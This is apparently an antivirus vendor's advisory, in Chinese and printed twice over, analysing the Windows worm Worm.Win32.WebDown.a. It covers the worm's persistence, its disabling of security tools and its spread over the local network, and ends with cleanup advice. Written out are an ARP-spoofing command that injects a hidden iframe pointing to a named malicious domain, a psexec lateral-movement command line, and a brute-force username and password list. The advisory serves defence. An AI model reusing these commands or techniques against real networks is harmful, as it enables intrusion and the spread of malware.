0
Worm.Win32.WebDown.a
危险等级:★★★
病毒名称:Worm.Win32.WebDown.a
截获时间:2007-12-20
入库版本:20.23.32
类型:感染型病毒
感染的操作系统:Windows所有版本系统
威胁情况:
传播级别:高
全球化传播态势:低
清除难度:困难
破坏力:高
破坏手段:网络传播、下载
这个是一个蠕虫型病毒,通过枚举局域网地址、获取被感染者当前的连接、下载ip地址信息的方式获取ip地址,并对这些地址尝试进行传播。病毒同时下载程序进行运行。病毒由VC6语言编写,加壳保护。
1、检查运行状态:
病毒运行后首先检测自己的是否是以“%system32%\IME\svchost.exe”运行,如不是则进行复制自己等初始化操作,反之则以服务方式运行。
2、初始化操作:
病毒删除“%system32%\IME\svchost.exe”,然后复制自己为该文件,并将属性设置为系统、隐藏,然后病毒调用CreateProcessA启动“%system32%\IME\svchost.exe”。
病毒启动“%system32%\IME\svchost.exe”后,释放批处理文件rs.bat并执行,以此来删除自己。
3、注册为服务运行:
病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数,注册名称为“Alerter COM+”、目标为“%system32%\IME\svchost.exe”的服务,然后调用StartServiceA启动服务。
4、病毒的服务过程
病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量,如失败则退出,以此来保证只有一个服务实例在运行。
病毒启动4个工作线程尝试进行网络传播和下载(详细见后面)。
病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制(详细见后面)。
病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口,并启动消息循环,然后向该窗口发送WM_DEVICECHANGE消息。
5、在固定磁盘中建立AutoRun实现自启动:
病毒根据标志(写在病毒内,推测为生成病毒时设置的)决定是否对固定硬盘建立自动运行机制。
如标志为建立,病毒对c到z逻辑盘调用GetDriveTypeA ,对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。
病毒复制自己到该逻辑盘根目录下,名称为“setup.exe”,并生成AutoRun.inf文件以达到自动运行,病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。
6、窗口消息处理:
在窗口循环中,病毒处理如下消息:
WM_CLOSE、WM_DESTROY消息,病毒调用默认窗口处理过程。
WM_CREATE消息,在窗口生成的时候,病毒调用SetTimer建立两个Timer,间隔为1秒和20分钟,回调方式为接收WM_TIMER消息。
WM_TIMER消息,病毒没隔1秒调用破坏反病毒软件和复制自己的代码(详细见后面),每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\down.exe并运行。
WM_DEVICECHANGE消息,病毒通过处理该消息得到新插入的可移动设备,并对该设备进行感染(写入病毒并建立AutoRun机制)。
7、破坏反病毒软件和复写文件:
病毒在通过处理WM_TIMER消息,每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口,检测其窗口标题中是否是或包含如下内容:
Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒
如包含这些内容,病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口,以此来破坏反病毒软件的运行。
病毒通过处理WM_TIMER消息,每隔1秒复制自己并复写注册表,以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe,并写入如下注册表信息:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Program file" = %SYSTEM%\PROGMON.EXE
工作线程1:
病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\BindF.exe并运行。
工作线程2:
病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\目录:
ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe
病毒获取当前网段(例如193.168.0.55),并将最后一个字段替换为%s2-%s255,然后以如下参数启动ArpW.exe。
“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src=&#039;http://www.1988712.cn/jj/index.htm&#039; width=0 height=0>"”
病毒通过下载的Arp欺骗病毒,将代码插入局域网中的http包中。
工作线程3:
病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。
在此线程中,病毒每隔30分钟循环执行如下代码感染网络:
(1)感染局域网计算机。病毒获取本机ip后以此遍历局域网,通过自带的用户名和密码字典(见后面)尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录,然后以如下命令行启动psexec.exe。
"%system32%\psexec.exe \\192.168.0.2 -u 用户名 -p "密码" -c %system32%\servrr.exe -d"
(2)感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp";,并通过在其中搜索“input name=\"ip\”来获取ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
(3)感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
用户名和密码字典如下:
用户名:administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser
密码:NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini
工作线程4:
病毒每隔1秒,循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。
8、病毒的感染代码:
在病毒体中包含了感染代码,但病毒本身并未调用。该感染代码中存在api地址硬编码等问题,在运行时会出现问题。
在感染代码中保护如下操作:
病毒首先复制自己为%system32\drivers\svchost.exe。
病毒将自己复制到如下目录,名称为随机文件名.exe:
%system32\drivers\、%system32\dllcache\、%system32\IME\
c:\Program Files\Common Files\Microsoft Shared\、
c:\Program Files\Internet Explorer\Connection Wizard\、
c:\Program Files\Windows Media Player\、
c:\WINDOWS\addins\、
c:\WINDOWS\system\
病毒遍历c到z的逻辑盘,对所有目录进行感染,但排除保护如下字符串的目录:
Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。
病毒只感染后缀名为exe的pe可执行文件,感染时病毒在被感染文件的代码节的最后的内容为0的地方(为文件对齐补的)写入病毒代码,并将pe头中入口点改为指向病毒代码。
在感染的病毒代码中,病毒调用CreateProcessA(该函数地址为感染时写入的硬编码)启动“C:\WINDOWS\system32\drivers\mmaou.exe”(感染时写入,文件为感染时复制的病毒本身),然后通过记录的原入口点跳回原程序正常入口点执行。
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到20.23.32版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
病毒名称:Worm.Win32.WebDown.a
截获时间:2007-12-20
入库版本:20.23.32
类型:感染型病毒
感染的操作系统:Windows所有版本系统
威胁情况:
传播级别:高
全球化传播态势:低
清除难度:困难
破坏力:高
破坏手段:网络传播、下载
这个是一个蠕虫型病毒,通过枚举局域网地址、获取被感染者当前的连接、下载ip地址信息的方式获取ip地址,并对这些地址尝试进行传播。病毒同时下载程序进行运行。病毒由VC6语言编写,加壳保护。
1、检查运行状态:
病毒运行后首先检测自己的是否是以“%system32%\IME\svchost.exe”运行,如不是则进行复制自己等初始化操作,反之则以服务方式运行。
2、初始化操作:
病毒删除“%system32%\IME\svchost.exe”,然后复制自己为该文件,并将属性设置为系统、隐藏,然后病毒调用CreateProcessA启动“%system32%\IME\svchost.exe”。
病毒启动“%system32%\IME\svchost.exe”后,释放批处理文件rs.bat并执行,以此来删除自己。
3、注册为服务运行:
病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数,注册名称为“Alerter COM+”、目标为“%system32%\IME\svchost.exe”的服务,然后调用StartServiceA启动服务。
4、病毒的服务过程
病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量,如失败则退出,以此来保证只有一个服务实例在运行。
病毒启动4个工作线程尝试进行网络传播和下载(详细见后面)。
病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制(详细见后面)。
病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口,并启动消息循环,然后向该窗口发送WM_DEVICECHANGE消息。
5、在固定磁盘中建立AutoRun实现自启动:
病毒根据标志(写在病毒内,推测为生成病毒时设置的)决定是否对固定硬盘建立自动运行机制。
如标志为建立,病毒对c到z逻辑盘调用GetDriveTypeA ,对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。
病毒复制自己到该逻辑盘根目录下,名称为“setup.exe”,并生成AutoRun.inf文件以达到自动运行,病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。
6、窗口消息处理:
在窗口循环中,病毒处理如下消息:
WM_CLOSE、WM_DESTROY消息,病毒调用默认窗口处理过程。
WM_CREATE消息,在窗口生成的时候,病毒调用SetTimer建立两个Timer,间隔为1秒和20分钟,回调方式为接收WM_TIMER消息。
WM_TIMER消息,病毒没隔1秒调用破坏反病毒软件和复制自己的代码(详细见后面),每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\down.exe并运行。
WM_DEVICECHANGE消息,病毒通过处理该消息得到新插入的可移动设备,并对该设备进行感染(写入病毒并建立AutoRun机制)。
7、破坏反病毒软件和复写文件:
病毒在通过处理WM_TIMER消息,每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口,检测其窗口标题中是否是或包含如下内容:
Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒
如包含这些内容,病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口,以此来破坏反病毒软件的运行。
病毒通过处理WM_TIMER消息,每隔1秒复制自己并复写注册表,以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe,并写入如下注册表信息:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Program file" = %SYSTEM%\PROGMON.EXE
工作线程1:
病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\BindF.exe并运行。
工作线程2:
病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\目录:
ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe
病毒获取当前网段(例如193.168.0.55),并将最后一个字段替换为%s2-%s255,然后以如下参数启动ArpW.exe。
“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src=&#039;http://www.1988712.cn/jj/index.htm&#039; width=0 height=0>"”
病毒通过下载的Arp欺骗病毒,将代码插入局域网中的http包中。
工作线程3:
病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。
在此线程中,病毒每隔30分钟循环执行如下代码感染网络:
(1)感染局域网计算机。病毒获取本机ip后以此遍历局域网,通过自带的用户名和密码字典(见后面)尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录,然后以如下命令行启动psexec.exe。
"%system32%\psexec.exe \\192.168.0.2 -u 用户名 -p "密码" -c %system32%\servrr.exe -d"
(2)感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp";,并通过在其中搜索“input name=\"ip\”来获取ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
(3)感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
用户名和密码字典如下:
用户名:administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser
密码:NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini
工作线程4:
病毒每隔1秒,循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。
8、病毒的感染代码:
在病毒体中包含了感染代码,但病毒本身并未调用。该感染代码中存在api地址硬编码等问题,在运行时会出现问题。
在感染代码中保护如下操作:
病毒首先复制自己为%system32\drivers\svchost.exe。
病毒将自己复制到如下目录,名称为随机文件名.exe:
%system32\drivers\、%system32\dllcache\、%system32\IME\
c:\Program Files\Common Files\Microsoft Shared\、
c:\Program Files\Internet Explorer\Connection Wizard\、
c:\Program Files\Windows Media Player\、
c:\WINDOWS\addins\、
c:\WINDOWS\system\
病毒遍历c到z的逻辑盘,对所有目录进行感染,但排除保护如下字符串的目录:
Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。
病毒只感染后缀名为exe的pe可执行文件,感染时病毒在被感染文件的代码节的最后的内容为0的地方(为文件对齐补的)写入病毒代码,并将pe头中入口点改为指向病毒代码。
在感染的病毒代码中,病毒调用CreateProcessA(该函数地址为感染时写入的硬编码)启动“C:\WINDOWS\system32\drivers\mmaou.exe”(感染时写入,文件为感染时复制的病毒本身),然后通过记录的原入口点跳回原程序正常入口点执行。
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到20.23.32版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
